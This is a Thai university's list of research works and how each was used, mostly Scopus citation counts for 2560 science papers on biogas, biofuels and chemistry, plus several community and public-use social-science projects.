รายการข้อมูลผลงานที่นำไปใช้ประโยชน์

จำนวนทั้งหมด 83 รายการ
# ชื่อผลงาน ชื่อผู้วิจัย รายละเอียดการนำไปใช้ สังกัด ประเภทการนำไปใช้ประโยชน์ การนำไปใช้เชิง ปีที่นำไปใช้ วันที่รับรองการนำไปใช้
                 
1 Computational of generalized projection method for maximal monotone operators and a countable family of relatively quasi-nonexpansive mappings ผศ.ดร.ศิวพร แซ่วัน ผู้ร่วมวิจัย Kumam, P. อ้างอิงในฐานข้อมูล Scopus จำนวน 3 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
2 Antibacterial and physical properties of ZnO with pH-sensitive morphology ผศ.ดร.ฉัตร ผลนาค ผศ.ดร.มณฑล เลิศวรปรีชา ผู้ร่วมวิจัย Sirisathitkul, C. Suwanboon, S. อ้างอิงในฐานข้อมูล Scopus จำนวน 2 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
3 Effects of volatile fatty acids in biohydrogen effluent on biohythane production from palm oil mill effluent under thermophilic condition น.ส.ชลธิชา มามิมิน (ปร.ดร. เทคโนโลยีชีวภาพ) ผศ.ดร.สมพงศ์ โอทอง ผู้ร่วมวิจัย Prasertsan, P (Prasertsan, Poonsuk) Kongjan, P (Kongjan, Prawit) อ้างอิงในฐานข้อมูล Scopus จำนวน 3 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
4 Biological Hydrogen Sulfide and Sulfate Removal from Rubber Smoked Sheet Wastewater for Enhanced Biogas Production นายคณาธิป พรหมนวล (นิสิต ปร.ด. เทคโนโลยีชีวภาพ) ผศ.ดร.สมพงศ์ โอทอง อ้างอิงในฐานข้อมูล Scopus จำนวน 2 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
5 Continuous hydrogen production from cassava starch processing wastewater by two-stage thermophilic dark fermentation and microbial electrolysis นายพีระวัฒน์ คงเกลี้ยง (ปร.ด. เทคโนโลยีชีวภาพ) ผศ.บุษกร อุตรภิชาติ ผศ.ดร.สมพงศ์ โอทอง ผู้ร่วมวิจัย Kongjan, P (Kongjan, Prawit) Reungsang, A (Reungsang, Alissara) อ้างอิงในฐานข้อมูล Scopus จำนวน 7 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
6 Biohythane production from Chlorella sp. biomass by two-stage thermophilic solid-state anaerobic digestion น.ส.อามีนี เจ๊ะลี (ปร.ด. เทคโนโลยีชีวภาพ) นายพีระวัฒน์ คงเกลี้ยง (ปร.ด. เทคโนโลยีชีวภาพ) นายวรรธนศักดิ์ สุขสง (ปร.ด. เทคโนโลยีชีวภาพ) รศ.ดร.จอมภพ แววศักดิ์ ผศ.ดร.สมพงศ์ โอทอง ผู้ร่วมวิจัย Rodjaroen, S (Rodjaroen, Somrak) อ้างอิงในฐานข้อมูล Scopus จำนวน 2 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
7 Thermophilic solid-state anaerobic digestion of solid waste residues from palm oil mill industry for biogas production ผศ.ดร.สมพงศ์ โอทอง นายวรรธนศักดิ์ สุขสง (นิสิต ปร.ด. เทคโนโลยีชีวภาพ) น.ส.อามีนี เจ๊ะลี (นิสิต ปร.ด. เทคโนโลยีชีวภาพ) น.ส.อภิญญา สิงห์ฆาฬะ (นิสิต ปร.ด. เทคโนโลยีชีวภาพ) ผู้ร่วมวิจัย Prawit Kongjan Poonsuk Prasertsan Tsuyoshi Imai อ้างอิงในฐานข้อมูล Scopus จำนวน 2 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
8 Production and characterization of biopolymer as bioflocculant from thermotolerant Bacillus subtilis WD161 in palm oil mill effluent ผศ.ดร.สมพงศ์ โอทอง ผู้ร่วมวิจัย Wilaiwan Chaisorn Poonsuk Prasertsan Pawadee Methacanon อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
9 Thermophilic hydrogen production from co-fermentation of palm oil mill effluent and decanter cake by Thermoanaerobacterium thermosaccharolyticum PSU-2 น.ส.ชลธิชา มามิมิน (ปร.ดร. เทคโนโลยีชีวภาพ) น.ส.อามีนี เจ๊ะลี (นิสิต ปร.ด. เทคโนโลยีชีวภาพ) นายสิทธิกร แซ่หล่อ (นิสิต ปร.ด. เทคโนโลยีชีวภาพ) ผศ.ดร.สมพงศ์ โอทอง ผู้ร่วมวิจัย Poonsuk Prasertsan อ้างอิงในฐานข้อมูล Scopus จำนวน 5 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
10 Two-stage thermophilic fermentation and mesophilic methanogenic process for biohythane production from palm oil mill effluent with methanogenic effluent recirculation for pH control ผศ.ดร.สมพงศ์ โอทอง นายวรรธนศักดิ์ สุขสง (นิสิต ปร.ด. เทคโนโลยีชีวภาพ) นายคณาธิป พรหมนวล (นิสิต ปร.ด. เทคโนโลยีชีวภาพ) นางสาวมาธวี ทิพย์มุณี (นิสิต วท.ม.เทคโนโลยีชีวภาพ) น.ส.ชลธิชา มามิมิน (ปร.ดร. เทคโนโลยีชีวภาพ) ผู้ร่วมวิจัย Poonsuk Prasertsan อ้างอิงในฐานข้อมูล Scopus จำนวน 9 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
11 Effect of DL-methionine supplementation on the success of almost total replacement of fish meal with soybean meal in diets for hybrid tilapia (Oreochromis niloticus × Oreochromis mossambicus) ผศ.ดร.สุภฎา คีรีรัฐนิคม ผู้ร่วมวิจัย Figueiredo-Silva, C. Lemme, A. Sangsue, D. อ้างอิงในฐานข้อมูล Scopus จำนวน 14 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
12 Laundry detergent-stable lipase from Pacific white shrimp (Litopenaeus vannamei) hepatopancreas: Effect of extraction media and biochemical characterization ว่าที่ร้อยตรีสกนวัจน์ เกื้อเพชร์แก้ว (นิสิต ปร.ด. เทคโนโลยีชีวภาพ) รศ.ดร.กนกพร สังขรักษ์ ผู้ร่วมวิจัย Soottawat Benjakulc Sappasith Klomklao อ้างอิงในฐานข้อมูล Scopus จำนวน 4 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
13 The production of polyhydroxybutyrate from liquid stillage and its application รศ.ดร.กนกพร สังขรักษ์ นายโอภาส ชูนุตร (นิสิต ปร.ด. เทคโนโลยีชีวภาพ) นางนิษา ไพจิตร นายเทวัญ หยู่หนู อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
14 Optimized synthesis of biodiesel using lipase from Pacific white shrimp (Litopenaeus vannamei) hepatopancreas ว่าที่ร้อยตรีสกนวัจน์ เกื้อเพชร์แก้ว (นิสิต ปร.ด. เทคโนโลยีชีวภาพ) รศ.ดร.กนกพร สังขรักษ์ ผู้ร่วมวิจัย Soottawat Benjakul Sappasith Klomklao อ้างอิงในฐานข้อมูล Scopus จำนวน 5 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
15 The production of biodiesel using residual oil from palm oil mill effluent and crude lipase from oil palm fruit as an alternative substrate and catalyst น.ส.เสาวคนธ์ สุวรรณโณ (นิสิต วท.ม. เคมีประยุกต์) น.ส.ธนาภรณ์ รักการ (นิสิต วท.บ. เคมี) น.ส.ภัทรวดี กิ้มตั้น (นิสิต วท.ม. เคมีประยุกต์) นางนิษา ไพจิตร นายเทวัญ หยู่หนู รศ.ดร.กนกพร สังขรักษ์ ผู้ร่วมวิจัย Poonsuk Prasertsan อ้างอิงในฐานข้อมูล Scopus จำนวน 8 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
16 Optimized synthesis method for transesterification of residual oil from palm oil mill effluent and lipase from Pacific white shrimp (Litopenaeus vannamei) hepatopancreas to environmentally friendly biodiesel น.ส.ธนาภรณ์ รักการ (นิสิต วท.บ. เคมี) น.ส.เสาวคนธ์ สุวรรณโณ (นิสิต วท.ม. เคมีประยุกต์) นางนิษา ไพจิตร นายเทวัญ หยู่หนู รศ.ดร.กนกพร สังขรักษ์ ผู้ร่วมวิจัย Sappasith Klomklao อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
17 Separation of carotenes and vitamin e from palm oil mill effluent using silica from agricultural waste as an adsorbent รศ.ดร.กนกพร สังขรักษ์ นางนิษา ไพจิตร นายเทวัญ หยู่หนู ผู้ร่วมวิจัย Puvanart KINGMAN อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
18 Biofuel production, characterization and degradation of 3-hydroxybutyate methyl ester from polyhydroxybutyrate รศ.ดร.กนกพร สังขรักษ์ นางนิษา ไพจิตร นายเทวัญ หยู่หนู ผู้ร่วมวิจัย Poonsuk Prasertsan อ้างอิงในฐานข้อมูล Scopus จำนวน 2 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
19 Offshore wind resource assessment and wind power plant optimization in the Gulf of Thailand รศ.ดร.จอมภพ แววศักดิ์ ผู้ร่วมวิจัย Landry, M. Gagnon, Y. อ้างอิงในฐานข้อมูล Scopus จำนวน 5 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
20 Assessment of wind power plants with limited wind resources in developing countries: Application to Ko Yai in southern Thailand รศ.ดร.จอมภพ แววศักดิ์ ผู้ร่วมวิจัย Kongruang, C. Gagnon, Y. อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
21 Greenhouse gases emission of refuse derived fuel-5 production from municipal waste and palm kernel รศ.ดร.จอมภพ แววศักดิ์ ผู้ร่วมวิจัย Nutongkaew, P. Chaichana, T. Gagnon, Y. อ้างอิงในฐานข้อมูล Scopus จำนวน 3 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
22 Indigenous halomonas spp., the potential nitrifying bacteria for saline ammonium waste water treatment ผศ.ดร.สมพงศ์ โอทอง ผู้ร่วมวิจัย Yutthapong Sangnoi Sunipa Chankaew อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
23 Biogas Production from Anaerobic Co-digestion of Palm Oil Mill Effluent and Empty Fruit Bunches ผศ.ดร.สมพงศ์ โอทอง นายสิทธิกร แซ่หล่อ (นิสิต ปร.ด. เทคโนโลยีชีวภาพ) ผู้ร่วมวิจัย Prawit Kongjan อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
24 Sulfite Pretreatment to Overcome Recalcitrance of Lignocellulose for Enzymatic Hydrolysis of Oil Palm trunk ผศ.ดร.สมพงศ์ โอทอง ผู้ร่วมวิจัย Pongsak Noparat Poonsuk Prasertsan Xuejun Pan อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
25 Anaerobic digestion foaming in full-scale biogas plants: A survey on causes and solutions ผศ.ดร.สมพงศ์ โอทอง ผู้ร่วมวิจัย Panagiotis G. Kougias Kanokwan Boe Irini Angelidaki อ้างอิงในฐานข้อมูล Scopus จำนวน 25 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
26 The average dimension of the Hermitian hull of cyclic codes over finite fields of square order อ.ดร.เอกสิทธิ์ สังวิสุทธิ์ ผู้ร่วมวิจัย Jitman, S. อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
27 Identification of laticifer-specific genes and their promoter regions from a natural rubber producing plant Hevea brasiliensis รศ.ดร.เกษม อัศวตรีรัตนกุล ผู้ร่วมวิจัย Yuichi Aoki Seiji Takahashi Daisuke Takayama Yoshiyuki Ogatac Nozomu Sakurai Hideyuki Suzuki Dhirayos Wititsuwannakul Rapepun Wititsuwannakulf Daisuke Shibatac Tanetoshi Koyama Toru Nakayama อ้างอิงในฐานข้อมูล Scopus จำนวน 4 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
28 Evaluation of Biogas Production Potential from Raw and Processed Agricultural Wastes ผศ.ดร.อุษา อ้นทอง อ.ดร.นิรมล จันทรชาติ อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
29 Removal of Hydrogen Sulfide from Biogas using Laterite Materials as an Adsorbent ผศ.ดร.อุษา อ้นทอง อ.ดร.นิรมล จันทรชาติ ผู้ร่วมวิจัย NatthakkanThanakunpaisit อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
30 Rhodomyrtosones G and H, minor phloroglucinols from the leaves of Rhodomyrtus tomentosa ผศ.วรรณฤดี หิรัญรัตน์ อ.ดร.อัษฎาวุธ หิรัญรัตน์ ผู้ร่วมวิจัย Mahabusarakam, W (Mahabusarakam, Wilawan) อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
31 Catalytic activity of various platinum loading in acid electrolyte at 303 K อ.ดร.จักรพงศ์ ไชยบุรี ผู้ร่วมวิจัย Hacker, V. อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
32 Adsorption of Methyl Orange on Coffee grounds Activated Carbon อ.ดร.พนิตา ก้งซุ่น นางสาวสุภาพร รัตนพันธ์ (นิสิต วท.ม. เคมีประยุกต์) ผู้ร่วมวิจัย Jiraporn Srikram อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
33 Copper(II) complex as a precursor for formation of cyano-bridged pentanuclear FeIII-CuII bimetallic assembly: Synthesis, characterization, crystal structure and antibacterial activity อาจารย์ ดร.อานอบ คันฑะชา ผู้ร่วมวิจัย SURACHAI KONGCHOO KITTIPONG CHAINOK SUMPUN WONGNAWA อ้างอิงในฐานข้อมูล Scopus จำนวน 5 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
34 Synthesis, Crystal Structure, and Spectroscopic Properties of Cu(II) Complex with 14-Membered Hexaazamacrocyclic Ligands อาจารย์ ดร.อานอบ คันฑะชา ผู้ร่วมวิจัย Surachai Kongchoo Saowanit Saithong Sumpun Wongnawa อ้างอิงในฐานข้อมูล Scopus จำนวน 9 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
35 Bioethanol Production from Oil Palm Frond by Simultaneous Saccharification and Fermentation ผศ.ดร.สมพงศ์ โอทอง น.ส.สุรีย์พร กำเนินดกลาง (ปร.ด. เทคโนโลยีชีวภาพ) ผศ.ดร. ชัยสิทธิ์ นิยะสม ผู้ร่วมวิจัย Larpkiattaworn, S. อ้างอิงในฐานข้อมูล Scopus จำนวน 6 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
36 Effect of Operating Parameters on Process Stability of Continuous Biohydrogen Production from Palm Oil Mill Effluent under Thermophilic Condition ผศ.ดร.สมพงศ์ โอทอง น.ส.ชลธิชา มามิมิน (ปร.ด. เทคโนโลยีชีวภาพ) ผศ.ดร. ชัยสิทธิ์ นิยะสม น.ส.ศรีสุดา ไชยกิจแก้ว (ปร.ด. เทคโนโลยีชีวภาพ) ผู้ร่วมวิจัย Prawit Kongjan อ้างอิงในฐานข้อมูล Scopus จำนวน 2 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
37 Towards Automatic Semantic Annotation of Thai Official Correspondence: Leave of Absence Case Study ผศ.ดร.สิรยา สิทธิสาร นายบูคอรี ซาเหาะ (วท.ม. เทคโนโลยีสารสนเทศ) อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
38 Genetic relatedness and differentiation of hatchery populations of Asian seabass (Lates calcarifer) (Bloch, 1790) broodstock in Thailand inferred from microsatellite genetic markers ผศ.ดร.แจ่มจันทร์ เพชรศิริ ผู้ร่วมวิจัย Wansuk Senanan Supapon Sonkaew Uthairat Na‐Nakorn Nipon Sean‐In Renu Yashiro อ้างอิงในฐานข้อมูล Scopus จำนวน 2 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
39 Why sildenafil and sildenafil citrate monohydrate crystals are not stable? รศ.ดร.หิริหัทยา เพชรมั่ง ผู้ร่วมวิจัย Somchai Sawatdee Chaveng Pakawatchai Kwanjai Nitichai Teerapol Srichana อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
40 Isolation, expression analysis and characterization of EgNDL, a NDR-like protein in oil palm (Elaeis guineensis Jacq.) อ.ดร.อรุณรัศมิ์ วณิชชานนท์ ผู้ร่วมวิจัย Kedsirin Ruttajorn Alisa Nakkaew Tanate Panrat Amornrat Phongdara อ้างอิงในฐานข้อมูล Scopus จำนวน 1 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
41 In search of molecular scale devices: Theoretical study of linearly fused straight single-walled carbon nanotube junctions based on the pentagon/heptagon pair defects อาจารย์ ดร.อนุรักษ์ อุดมเวช ผู้ร่วมวิจัย Shafiquzzaman, M. Kerdcharoen, T. อ้างอิงในฐานข้อมูล Scopus จำนวน 3 ครั้ง (ปีการศึกษา 2560) คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
42 คุณภาพน้ำในคลองป่าพะยอมและคลองท่าแนะเพื่อการบริหารจัดการน้ำชุมชนแบบมีส่วนร่วมอย่างยั่งยืน อ.ดร.เตือนตา ร่าหมาน นวัตกรรม การดูแลสุขภาพน้ำชุมชน ครูและนักเรียนโรงเรียนวัดภูเขาทอง อ.ควนขนุน จ.พัทลุง ครูและนักเรียนโรงเรียนนาขยาดวิทยาคม อ.ควนขนุน จ.พัทลุง อาจารย์จากมหาวิทยาลัยสงขลานครินทร์ คณะวิทยาศาสตร์ เชิงพาณิชย์ เชิงสาธารณะ 2560
43 ความหลากหลายของชนิดพันธุ์ไม้และปริมาณการสะสมคาร์บอนและไนโตรเจนในมวลชีวภาพของไม้และในดินป่าชุมชนบ้านป่าพงศ์ ผศ.อานุช คีรีรัฐนิคม นำงานวิจัยไปเผนแพร่ให้กับผู้นำชุมชนในพื้นที่ตำบลท่ามะเดื่อ เพื่อให้ชุมชนได้เห็นความสำคัญของป่าไม้ด้านการกักเก็บคาร์บอนและเป็นแนวทางให้ชุมชนมีส่วนร่วมในการอนุรักษ์ป่าไม้ คณะวิทยาศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
44 คุณภาพในคลองป่าพะยอมและคลองท่าแนะเพื่อการบริหารจัดการน้ำแบบมีส่วนร่วมอย่างยั่งยืน อ.ดร.เตือนตา ร่าหมาน ครู และนักเรียนโรงเรียนวัดภูเขาทอง และโรงเรียนนาขยาดวิทยาคม ในอ.ควนขนุน จ.พัทลุง คณะวิทยาศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
45 Relationships between zooplankton community and water quality in Pha-Payom canal, Phattalung Province, Southern Thailand อ.ดร.เตือนตา ร่าหมาน Middle-East Journal of Scientific Research คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
46 การผลิตกรดไขมันโอเมก้า-3 โดยทรอสโทไคทริดส์ อ.ดร.พฤทฐิภร ศุภพล ตีพิมพ์ในวารสาร TCI กลุ่มที่ 1 คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
47 อัตราการเจริญเติบโต อัตรารอด และคุณภาพเนื้อปลากะพงขาวที่เลี้ยงด้วยระบบต่างกัน ผศ.ดร.แจ่มจันทร์ เพชรศิริ น.ส.จุฑารัตนื เพชรทอง ชุมชนตะโหมด นำไปใข้ต่อในการเลี้ยงสัตว์น้ำในพื้นที่ของชุมชนตะโหมด คณะวิทยาศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
48 ความหลากหลายของขนิดพันธ์ไม้และปริมาณการสะสมคาร์บอนและไนโตรเจนในมวลชีวภาพของไม้และในดินป่าชุมชนบ้านป่าพงศ์ ผศ.อานุข คีรีรัฐนิคม นำข้อมูลไปเผยแพร่ให้กับชาวบ้าน เพื่อให้ชุมชนได้เห็นความสำคัญของป่าไม้ด้านการเก็บกักความร้อนฯ คณะวิทยาศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
49 การสังเคราะห์และฤทธิ์ยับยั้งเอนไซม์แอลฟากลูโคซิเดสของสารอนุพันธ์ไฮดราโซน ผศ.ดร.ณวงศ์ บุญนาค เผยแพร่ในวารสาร คณะวิทยาศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
50 การศึกษาการพัฒนาระบบสารสนเทศเพื่อสนับสนุนโครงการการบริหารจัดการน้ำฯ อนิศรา เพ็ญสุข ติ๊บแก้ว นวัตกรรม การใช้ระบบสารสนเทศสำหรับนักวิจัยชุมชน คณะเทคโนโลยีและการพัฒนาชุมชน เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
51 คุณภาพของเอนไซม์โปรติเนสจากเครื่องในปลานิล (Oreochromis niloticus Linneaus) และผลต่อการย่อยสลายเนื้อวัว นายศราวุธ เหมหมัด เป็นการนำวัสดุเศษเหลือใช้มาเพิ่มมูลค่าและแปรรูป คณะเทคโนโลยีและการพัฒนาชุมชน เชิงสังคม เชิงสาธารณะ 2560
52 กาใช้ชุมชนเป็นฐานกับการส่งเสริมสุขภาพเด็กวัยเรียนที่มีภาวะน้ำหนักตัวเกินในโรงเรียนประถมศึกษาชนบทภาคใต้ประเทศไทย อาจารย์ ดร.ดุษณีย์ สุวรรณคง ใช้กับโรงเรียนในภาคใต้ คณะวิทยาการสุขภาพและการกีฬา เชิงสังคม เชิงสาธารณะ 2560
53 โครงการประเมินผลการปฏิบัติราชการ 3 ด้าน (BSC) ประจำปีงบประมาณ 2560 รศ.ภาณุ ธรรมสุวรรณ โดยผู้บริหารขององค์การบริหารส่วนจังหวัดสตูล ได้ตั้งเป้าหมายในการปฏิบัติราชการขององค์การอย่างชัดเจน โดยการกระตุ้นให้บุคลากรในสังกัดปฏิบัติงานอย่างมุ่งผลสัมฤทธิ์ มีตัวชี้วัดการปฏิบัติราชการ และนำผลการปฏิบัติราชการดังกล่าวมาเป็นเกณฑ์ในการพิจารณาเลื่อนเงินเดือนให้แก่บุคลากรในสังกัด คณะมนุษยศาสตร์และสังคมศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
54 โครงการติดตามและประเมินผลแผนพัฒนาองค์การบริหารส่วนจังหวัดสตูล ประจำปีงบประมาณ 2560 รศ.ภาณุ ธรรมสุวรรณ 1.การใช้ประโยชน์ในเชิงสาธารณะ โดยองค์การบริหารส่วนจังหวัดสตูล ได้ประกาศผลการดำเนินการติดตามและประเมินผลแผนพัฒนาประจำปี พ.ศ. 2560 และเป็นไปตามระเบียบกระทรวงมหาดไทยว่าด้วยการจัดทำแผนพัฒนาขององค์กรปกครองส่วนท้องถิ่น พ.ศ. 2548 และแก้ไขเพิ่มเติมบับที่ 2 พ.ศง 2559 เพื่อให้ประชาชนได้มีส่วนร่วมในการตรวจสอบ และกำกับการบริหารจัดการองค์การบริหารส่วนจังหวัดสตูล ส่งผลต่อประโยชน์สูงสุดของประชาชนในจังหวัดต่อไป 2.การใช้ประโยชน์เชิงนโยบาย โดยการนำผลการติดตามและประเมินผลแผนพัฒนา ประจำปีงบประมาณ พ.ศ. 2560 ขององค์การบริหารส่วนจังหวัดสตูล มาเป็นกระบวนการหนึ่งในการวัดผลการบริหารและการปฏิบัติราชการขององค์การบริหารส่วนจังหวัด ว่ามีผลสัมฤทธิ์ตรงตามแผนงาน เป้าหมาย ภารกิจ ที่วางไว้มากน้อยเพียงใด คณะมนุษยศาสตร์และสังคมศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
55 การเล่นกลองบานอในจังหวัดชายแดนภาคใต้ของปะเทศไทย รศ.ดร.พรพันธุ์ เขมคุณาศัย 1. เป็นแนวทางในการสืบสานถ่ายทอดแก่เยาวชน 2. กำหนดในแผนพัฒนาท้องถิ่น ด้านศิลปะการแสดงบานอ 3. สร้างมีการส่วนร่วมของชุมชนฝ่ายศิลปการเล่นกลองบานอในชุมชน คณะมนุษยศาสตร์และสังคมศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
56 การประยุกต์ใช้ภูมิสารสนเทศเพื่อการเตรียมความพร้อมอุทกภัยในตำบลท่าหิน อำเภอสทิงพระ จังหวัดสงขลา อาจารย์ ดร.วรุตม์ นาที ใช้ในการวางแผนการเตรียมความพร้อมต่อการเกิดอุทกภัยในพื้นที่ตำบลท่าหินและเป็นตัวอย่างในการจัดการอุทกภัยให้กับชุมชนอื่นๆ คณะมนุษยศาสตร์และสังคมศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
57 การจัดการท่องเที่ยวโดยชุมชนในรูปแบบหมู่บ้านวัฒนธรรมเพื่อรองรับประชาคมอาเซียนบริเณคาบสมุทรสทิงพระ จังหวัดสงขลา อ.ดร.อดิศร ศักดิ์สูง ผู้ร่วมวิจัย อ.ดร.วรุตม์ นาที เป็นต้นแบบของการจัดการหมู่บ้านเพื่อการท่องเที่ยวในการรองรับการเข้าสู่ประชาคมอาเซียน คณะมนุษยศาสตร์และสังคมศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
58 Cell phone networks and migrant networks: the case of Nayu migrant workers in Malaysia. ผศ.ดร.สุทธิพร บุญมาก ได้รับการอ้างอิงผลงานในหนังสือ International Handbook of Migration and Population Distribution บทความเรื่อง Urban Migration of Adolescent Girls: Quantitative Results from Development Countries โดย Mark R. Montgomery, Deborah Balk, Zhen Liu, Siddharth Agarwal, Eleri Jonhes and Susana Adamo สำนักพิมพ์ Springer หน้า 573-604 คณะมนุษยศาสตร์และสังคมศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560
